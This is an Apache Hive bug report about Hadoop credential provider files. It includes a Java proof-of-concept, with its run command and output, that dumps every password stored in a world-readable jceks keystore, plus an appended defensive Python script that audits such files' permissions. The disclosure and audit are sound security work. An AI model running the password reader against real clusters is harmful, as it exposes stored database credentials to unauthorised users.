Hive
HIVE-19746

Hadoop credential provider allows to read passwords for every user


Details

    • Type: Bug
    • Status: Open
    • Priority: Blocker
    • Resolution: Unresolved
    • Component: Security

    Description

      This simple program allows reading any password from any jceks file:

      package com.test.app;
      
      import java.util.List;
      import org.apache.hadoop.conf.Configuration;
      import org.apache.hadoop.security.alias.CredentialProvider;
      import org.apache.hadoop.security.alias.CredentialProviderFactory;
      
      import java.io.IOException;
      
      public class PasswordReader {
        public static void main(String[] args) throws IOException {
          if (args == null || args.length == 0) {
            throw new IllegalArgumentException("Credential provider path must be set");
          }
          String credentialProviderPath = args[0];
          // Point the provider factory at the keystore URI given on the command line
          Configuration configuration = new Configuration();
          configuration.set(CredentialProviderFactory.CREDENTIAL_PROVIDER_PATH, credentialProviderPath);
          // Take the first configured provider and enumerate every alias stored in it
          CredentialProvider credentialProvider = CredentialProviderFactory.getProviders(configuration).get(0);
          List<String> aliases = credentialProvider.getAliases();
          for (String alias : aliases) {
            // Configuration.getPassword resolves the alias through the configured providers
            System.out.println(alias + " = " + new String(configuration.getPassword(alias)));
          }
        }
      }
      
      java -cp $(hadoop classpath):password-reader.jar com.test.app.PasswordReader jceks://hdfs/user/hive/hivemetastore.jceks
      

      RESULT

      javax.jdo.option.connectionpassword = 123456
      

      File jceks://hdfs/user/hive/hivemetastore.jceks has -rw-r--r-- permissions and hdfs:hdfs owner:group. We can't remove world-readable permissions here, because Hive is configured for impersonation to allow users other than hdfs to connect to HiveServer2. When I removed world-readable permissions and tried to connect as another user, I got the exception:

      2018-05-31T10:08:40,191 ERROR [pool-7-thread-41] fs.Inode: Marking failure for: /user/hive/hivemetastore.jceks, error: Input/output error
      2018-05-31T10:08:40,192 ERROR [pool-7-thread-41] fs.Inode: Throwing exception for: /user/hive/hivemetastore.jceks, error: Input/output error
      2018-05-31T10:08:40,192 ERROR [pool-7-thread-41] metastore.RetryingHMSHandler: java.lang.RuntimeException: Error getting metastore password: null
          at org.apache.hadoop.hive.metastore.ObjectStore.getDataSourceProps(ObjectStore.java:485)
          at org.apache.hadoop.hive.metastore.ObjectStore.setConf(ObjectStore.java:279)
      

      Any ideas how to protect the passwords (let's say restrict access to jceks://hdfs/user/hive/hivemetastore.jceks to 600) and at the same time still be able to connect to HS2 as a non-admin user?
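As an added example (not code from the issue, from Hive or from Hadoop), the following audit takes the value of hadoop.security.credential.provider.path and the text output of `hdfs dfs -ls`, and reports which configured provider files carry the world-readable mode the report describes for /user/hive/hivemetastore.jceks. The listing, the second and third file names, and all sizes and dates are constructed sample input; the property name and the jceks URI-to-path mapping are as used on the page.

```python
"""Audit Hadoop credential-provider files for world-readable permissions.

Added example, not code from the Hive issue or from Hadoop: it takes the
value of hadoop.security.credential.provider.path and the text output of
`hdfs dfs -ls`, and reports which provider files carry the world-readable
mode (-rw-r--r--) that the report shows for hivemetastore.jceks.
"""
from dataclasses import dataclass
from urllib.parse import urlparse

# Real Hadoop property name (CredentialProviderFactory.CREDENTIAL_PROVIDER_PATH).
CREDENTIAL_PROVIDER_PATH = "hadoop.security.credential.provider.path"


@dataclass(frozen=True)
class LsEntry:
    mode: str    # symbolic mode as printed by hdfs dfs -ls, e.g. "-rw-r--r--"
    owner: str
    group: str
    path: str


def parse_hdfs_ls(output: str) -> list[LsEntry]:
    """Parse `hdfs dfs -ls` lines.

    Column layout: mode, replication (or '-' for directories), owner, group,
    size, date, time, path. The leading "Found N items" line is skipped.
    """
    entries = []
    for line in output.splitlines():
        parts = line.split()
        if len(parts) < 8 or parts[0] == "Found":
            continue
        mode, _replication, owner, group, _size, _date, _time = parts[:7]
        path = " ".join(parts[7:])  # paths may contain spaces
        entries.append(LsEntry(mode, owner, group, path))
    return entries


def provider_paths(provider_list: str) -> list[str]:
    """Map provider URIs such as jceks://hdfs/user/hive/x.jceks to their file paths.

    The property holds a comma-separated list; the scheme selects the provider
    class and the path component is where the keystore lives on that filesystem.
    """
    return [urlparse(uri.strip()).path for uri in provider_list.split(",") if uri.strip()]


def is_world_readable(mode: str) -> bool:
    """True when the 'other' read bit (position 7 of a 10-character mode) is set."""
    return len(mode) >= 10 and mode[7] == "r"


def audit_providers(provider_list: str, ls_output: str) -> dict[str, str]:
    """Return one finding per configured provider path.

    Findings are "world-readable", "restricted" or "not in listing". A trailing
    '+' on the mode means an HDFS ACL is present, which the mode bits alone do
    not describe, so such entries are additionally flagged for a getfacl review.
    """
    listing = {e.path: e for e in parse_hdfs_ls(ls_output)}
    findings = {}
    for path in provider_paths(provider_list):
        entry = listing.get(path)
        if entry is None:
            findings[path] = "not in listing"
            continue
        verdict = "world-readable" if is_world_readable(entry.mode) else "restricted"
        if entry.mode.endswith("+"):
            verdict += " (ACL present, review with getfacl)"
        findings[path] = f"{verdict}: {entry.mode} {entry.owner}:{entry.group}"
    return findings


# Constructed sample input: the first line mirrors the permissions quoted in
# the report; the second file and all sizes/dates are made up.
SAMPLE_LS = """Found 2 items
-rw-r--r--   3 hdfs hdfs       1412 2018-05-31 10:00 /user/hive/hivemetastore.jceks
-rw-------   3 hive hive       1280 2018-05-31 10:01 /user/hive/restricted.jceks
"""
SAMPLE_PROVIDERS = (
    "jceks://hdfs/user/hive/hivemetastore.jceks,"
    "jceks://hdfs/user/hive/restricted.jceks,"
    "jceks://hdfs/user/hive/missing.jceks"
)

if __name__ == "__main__":
    for path, finding in audit_providers(SAMPLE_PROVIDERS, SAMPLE_LS).items():
        print(f"{path}: {finding}")
```

The check only reads the POSIX mode bits; on clusters with HDFS ACLs enabled a file can be readable by extra users or groups without that showing in the mode string, which is why entries whose mode ends in '+' are flagged for a separate getfacl review rather than reported as restricted.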

            People

              Assignee: Oleksiy Sayankin (osayankin)
              Reporter: Oleksiy Sayankin (osayankin)
              Votes: 0
              Watchers: 4
